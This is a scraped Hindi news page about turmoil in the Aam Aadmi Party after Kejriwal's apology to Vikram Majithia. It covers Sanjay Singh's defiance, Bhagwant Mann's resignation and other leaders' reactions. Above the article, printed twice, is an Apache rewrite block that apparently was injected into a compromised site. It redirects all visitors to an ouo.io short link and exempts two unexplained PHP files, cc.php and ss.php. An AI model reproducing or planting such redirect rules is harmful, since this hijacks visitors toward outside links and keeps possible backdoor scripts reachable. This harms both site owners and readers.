
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 578
Previousनई दिल्ली। दिल्ली के मुख्यमंत्री अरविंद केजरीवाल द्वारा पंजाब कांग्रेस नेता विक्रम मजीठिया से माफी मांगने के मामले में आप नेता व राज्यसभा सदस्य संजय सिंह लगातार पार्टी के लिए एक से एक मुसीबत खड़ी करते जा रहे हैं। अभी तक वे अपने स्टैंड पर कायम है। हालांकि, इस बार उन्होंने इसके लिए केजरीवाल को जिम्मेदार नहीं ठहराकर उनकी मंडली को दोषी करार दिया है। उनका कहना है कि केजरीवाल के इस अप्रत्याशित कदम के लिए उनके इर्द-गिर्द रहने वाली मंडली जिम्मेदार हैं।
आपको बता दें कि कल संजय सिंह ने कहा था कि मैं अब भी अपने बयानों पर कायम हूं, मैं अब भी मानता हूं कि मजीठिया ड्रग्स के कारोबार में शामिल थे। उन्होंने कहा कि मैं नहीं जानता कि अरविंद केजरीवाल का इस मुद्दे पर क्या स्टैंड है, लेकिन मैं अपनी बात पर कायम हूं। इस बयान के बाद आप में बगावत साफतौर पर देखा जा सकता है। अब वह अपने इस बयान से एक कदम आगे निकल चुके हैं। उन्होंने कहा कि 'मैं विक्रम मजीठिया को कभी माफ नहीं कर सकता।' उन्होंने कहा कि हम इस मामले पर अंत तक लड़ेंगे और विक्रम मजीठिया को जेल भिजवा कर ही दम लेंगे। उनके इस बयान से आम आदमी पार्टी के अंदर सियासत और तेज हो गई है।
उधर, भगवंत मान ने फेसबुक पर पंजाबी और अंग्रेजी भाषा मे पोस्ट करते हुए अपने इस्तीफ़े की जानकरी दी है। भगवंत मान ने लिखा कि मैं आम आदमी पार्टी के पंजाब अध्यक्ष पद से इस्तीफ़ा दे रहा हूं, लेकिन ड्रग माफिया और तमाम भ्रष्टाचार के खिलाफ मेरी लड़ाई एक 'आम आदमी' की तरह जारी रहेगी। केजरीवाल की माफी से पंजाब में आप के कार्यकर्ता संतुष्ट नहीं हैं। पंजाब में आप विधायक कंवर संधु ने कहा कि अगर आप सत्य के लिए खड़े होते हैं तो मानहानि का सामना करना पड़ता है। मैं केवल माफिया द्वारा दाखिल केस का सामना कर रहा हूं। केजरीवाल की माफी ने युवाओं को शर्मिंदा किया है। आप नेता व पंजाब विधानसभा में नेता विपक्ष सुखपाल सिंह खैरा का कहना है कि केजरीवाल के माफी मांगने से हम पूरी तरह चकित हैं। हमें इस बात को स्वीकार करने में कोई गुरेज नहीं है कि हमसे इस बारे में कोई चर्चा नहीं की गई।
उधर, केजरीवाल से खफा चल रहे आप नेता कुमार विश्वास ने मजीठिया से माफी मांगे जाने पर ट्वीट कर केजरीवाल की चुटकी ली है। उन्होंने केजरीवाल पर निशाना साधा है। उन्होंने इस मामले में एक कविता ही गढ़ डाली 'एकता बांटने में माहिर है, खुद की जड़ काटने में माहिर है, हम क्या उस शख्स पर थूकें जो खुद, थूक कर चाटने में माहिर है।